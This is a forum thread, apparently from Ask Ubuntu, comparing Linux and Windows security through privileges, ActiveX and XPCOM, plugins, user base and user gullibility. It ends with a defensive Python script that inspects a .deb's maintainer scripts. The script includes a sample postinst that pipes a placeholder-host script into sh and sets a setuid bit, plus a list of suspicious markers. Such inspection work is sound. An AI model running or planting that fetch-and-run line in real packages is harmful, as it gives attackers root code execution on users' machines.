Windows has had a single-user ethos for a very long time. Even with the invention of NT and a role/privilege system, default installs would plonk users as king of the hill. Their account (and, more importantly, anything running as their account) could do anything to any file without a check.
This is huge because any application, and any exploit in an application, could run as Administrator.
It's only since Vista that this has been reversed and tightened with things like UAC...
Source access is a double-edged sword. Open source enthusiasts usually tout security, but it also lets people look right into the system. They don't have to report anything they find; they could just write exploits for the hole.
Thankfully, most people do report any flaws they find. Even better, they sometimes include patches that can be immediately tested and distributed.
The turnaround for patching security holes does seem shorter than for closed source software.
There are just fewer of us.
Sounds bleak, but there are fewer people using any one particular open source application. It's hard to justify writing an exploit, trojan, worm, etc. when you could write one for Windows in the same time and catch a lot more people.
But we can't be complacent. There's no reason why a trojan or worm can't work in Linux. A malicious app running as a limited user can still do a whole load of damage. And the real flaw in all of this is the users.
Users are idiots who can be convinced to do almost anything if you dress it up with enough pomp or make it look like they're going to get something worthwhile from the process.
Read: Linux isn't invulnerable. Don't say it is. (Disclaimer: my post, my blog)
Does Firefox under Ubuntu have something similar to ActiveX, in terms of security vulnerability?
‘ActiveX’ can be considered in two parts, the object model and the installation method. Firefox has something similar—and cross-platform compatible, Ubuntu or other—for both.
The object model of ActiveX is Microsoft COM; Firefox's equivalent is XPCOM. Many other Windows features and applications that are nothing to do with web browsing use MS COM, and there have traditionally been endless problems where COM controls that were not written for secure web usage were nonetheless available to web pages. This caused many compromises. Firefox is better off here as XPCOM is not shared with the rest of the system. Newer versions of IE have better controls for mitigating what sites are allowed to use what controls.
(As a side-issue, because many add-ons for Firefox are themselves written in JavaScript, a high-level scripting language, they are often more secure from buffer overflow and string handling errors than extensions for IE which are commonly written in C[++].)
The control-downloader part of ActiveX has also been cleaned up a bit since the bad old days when anything in the My Computer zone could install any software it liked, and aggressive loader scripts could trap you in an alert loop until you agreed to approve the ActiveX prompt. Firefox's equivalent, XPInstall, behaves largely similarly, with the ‘information bar’ on all but Mozilla's sites by default and a suitable warning/prompt before installation.
There is another built-in way you can compromise yourself in Mozilla: signed scripts. I have never seen this actually used, and certainly there'll be another warning window appear before a script gains extra rights, but it kind of worries me that this is available to web pages at all.
For example, an exploit through Flash will gain access to my PC under my user rights.
Yes, the majority of web exploits today occur in plugins. Adobe Reader, Java(*) and QuickTime are the most popular/vulnerable. IMO: get rid of those, and use FlashBlock to only show Flash when you want it.
(*: and Java's dialogues before it lets you give up all security to some untrusted applet are a bit bare too.)
Ubuntu gives you some questionable plugins by default, in particular a media player plugin that will make every vulnerability in any of your media codecs exploitable through the web (similar to the Windows Media Player plugin, only potentially with many more formats). Whilst I have yet to meet an exploit targeting Linux like this, that's really only security through obscurity.
Note that ActiveX itself is no different. A web browser compromise based on ActiveX still only gives user-level access; it's only because prior to Vista everyone habitually ran everything as Administrator that this escalated to a full-on rooting.
And then follow that by exploiting some known vulnerability in X to gain root rights. That is not "easy".
Maybe, maybe not. But I think you'll find the damage some malware can do from even a normal user account is quite bad enough. Copy all your personal data, observe your keypresses, delete all your documents...
Best Answer
A system is never 100% secure and there are always vulnerabilities, in every OS. Some are known and some are still waiting to be discovered. It's a fact, though, that the UNIX/Linux security architecture (from which Apple's OS X is also derived) is much stronger than the one Windows had in the past, and I believe it's still slightly stronger than what they have nowadays, although the difference has shrunk.
The advantage of a system with a very low user count is that hackers (speaking only of black hats that want to attack you) have pretty little interest in spending their time on Linux, because even if they find an open backdoor, they can't make much profit from it as there are too few potential targets.
So the more users an OS has, the more interesting it is for people with criminal intent to find and exploit vulnerabilities. However, this also means that more white hat researchers will check it out and fix some of those problems. So there will always be a balance between white and black, though experience shows us that the dark side usually has a slightly higher growth rate.
However, the OS itself does not become more insecure or vulnerable once there is a large user base. The weak points remain the same; they just weren't known earlier. But as knowing about a problem is required to be able to fix it...
However, it's not really correct to say that Linux in general has a small user base today. Desktop computers mainly run Windows rather than Linux distributions, but that's not the only type of computer we have. A majority of web servers run on Linux, and e.g. the Android OS for smartphones is actually Linux-based. These systems all have major differences, so a hack on one would probably not work on the other, especially as installed software is much more vulnerable than the system/kernel itself, so an attacker would rather try to break into that or trick the user.
Additionally (thanks @Rinzwind), it's also important to say that Linux systems in general can be seen as systems for advanced users (total computer noobs probably haven't even heard anything about it yet), whereas Windows is just what everybody uses, no matter what skills he/she has, as it comes preinstalled on almost every machine nowadays. This is important because many attacks depend on vulnerabilities in the interface between keyboard and chair, also known as "The User". Of course, many also just think they're experts and pay even less attention when downloading .deb packages from websites or compiling foreign code from source, because they believe the myth of "bulletproof Linux". So just copy-pasting sudo commands or installing software as root is and stays dangerous, because Linux systems are not designed to protect the user from themselves!
To conclude, we can say that higher user numbers make the OS more secure in theory, as more vulnerabilities are detected and fixed, especially when it is open source. But in practice this also increases the number of attacks, as it becomes a more interesting target.
However, the system itself is usually the strongest part of the security chain; the weak parts are vulnerabilities in additional software (browsers, Flash Player...) or the users themselves, as it's easy to trick non-experts into installing malicious programs or running evil copy-pasted sudo commands.
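The answer above ends on the point that installing a .deb from a website as root is where Linux will not protect you from yourself. What actually runs as root during `sudo dpkg -i` is the package's maintainer scripts (preinst/postinst/prerm/postrm), which live in the `control.tar.*` member of the .deb (an `ar` archive). The following is an added example, not code from any answer on this page: it builds a constructed sample package in memory (the package name, hostname and scripts are made up), pulls the maintainer scripts back out with only the standard library, and flags lines that deserve a look before installation. The list of "suspicious" markers is an illustrative assumption, not an authoritative indicator list.

```python
"""Read what a .deb will run as root before installing it.

A .deb is an `ar` archive holding debian-binary, control.tar.* and data.tar.*.
dpkg executes the maintainer scripts inside control.tar.* as root, so those
scripts are what to inspect for a package downloaded from a random website.
"""
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Heuristic markers worth a second look in a script that runs as root.
# Assumption for this example, not an exhaustive or authoritative list.
SUSPICIOUS = ("curl", "wget", "| sh", "| bash", "base64 -d", "chmod u+s",
              "crontab", "/etc/sudoers", "authorized_keys")


def _ar_header(name: str, size: int) -> bytes:
    """60-byte ar member header: name16 mtime12 uid6 gid6 mode8 size10 magic2."""
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{size:<10}`\n".encode()
    assert len(hdr) == 60
    return hdr


def _tar_gz(files: dict) -> bytes:
    """In-memory .tar.gz from {name: text}; maintainer scripts get mode 0755."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, text in files.items():
            data = text.encode()
            info = tarfile.TarInfo("./" + name)
            info.size = len(data)
            info.mode = 0o755 if name in MAINTAINER_SCRIPTS else 0o644
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_deb(control: str, scripts: dict) -> bytes:
    """Constructed sample package: control file plus maintainer scripts, no payload."""
    members = [("debian-binary", b"2.0\n"),
               ("control.tar.gz", _tar_gz({"control": control, **scripts})),
               ("data.tar.gz", _tar_gz({}))]
    out = b"!<arch>\n"
    for name, data in members:
        out += _ar_header(name, len(data)) + data
        if len(data) % 2:          # ar members are 2-byte aligned
            out += b"\n"
    return out


def ar_members(blob: bytes) -> dict:
    """Parse the flat ar layout dpkg uses (no GNU long-name extension needed)."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive, so not a .deb")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header")
        name = hdr[0:16].decode().rstrip().rstrip("/")
        size = int(hdr[48:58].decode())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)
    return members


def maintainer_scripts(deb: bytes) -> dict:
    """{script_name: text} for every maintainer script found in control.tar.*."""
    members = ar_members(deb)
    ctrl = next(n for n in members if n.startswith("control.tar"))
    found = {}
    with tarfile.open(fileobj=io.BytesIO(members[ctrl]), mode="r:*") as tf:
        for m in tf.getmembers():
            base = m.name.split("/")[-1]
            if m.isfile() and base in MAINTAINER_SCRIPTS:
                found[base] = tf.extractfile(m).read().decode(errors="replace")
    return found


def flag_lines(script: str) -> list:
    """(line number, line) pairs containing any SUSPICIOUS marker."""
    return [(n, line.strip()) for n, line in enumerate(script.splitlines(), 1)
            if any(tok in line for tok in SUSPICIOUS)]


def review(deb: bytes) -> dict:
    """Per-script flagged lines; an empty list means nothing matched."""
    return {name: flag_lines(text) for name, text in maintainer_scripts(deb).items()}


# Constructed sample: postinst pipes a remote script into sh and sets a
# setuid bit. Package name and hostname are placeholders.
SAMPLE_CONTROL = ("Package: shiny-widget\nVersion: 1.0\nArchitecture: all\n"
                  "Maintainer: nobody <nobody@example.invalid>\n"
                  "Description: constructed sample package\n")
SAMPLE_SCRIPTS = {
    "preinst": "#!/bin/sh\nset -e\nexit 0\n",
    "postinst": ("#!/bin/sh\nset -e\n"
                 "curl -fsSL http://updates.example.invalid/setup.sh | sh\n"
                 "chmod u+s /usr/bin/shiny-widget\n"),
}

if __name__ == "__main__":
    for name, hits in review(build_deb(SAMPLE_CONTROL, SAMPLE_SCRIPTS)).items():
        print(f"{name}: {len(hits)} flagged line(s)")
        for lineno, line in hits:
            print(f"  {lineno}: {line}")
```

On a real package you would feed `open("foo.deb", "rb").read()` to `review()`, or skip the parser and run `dpkg-deb -e foo.deb DIR` to drop the control files (including the maintainer scripts) into `DIR` for reading. Either way, the point is the same as the answer's: a grep for `curl ... | sh` is a hint, not a verdict, and nothing in the package format stops a script from doing arbitrary things as root, so look before you `sudo dpkg -i`.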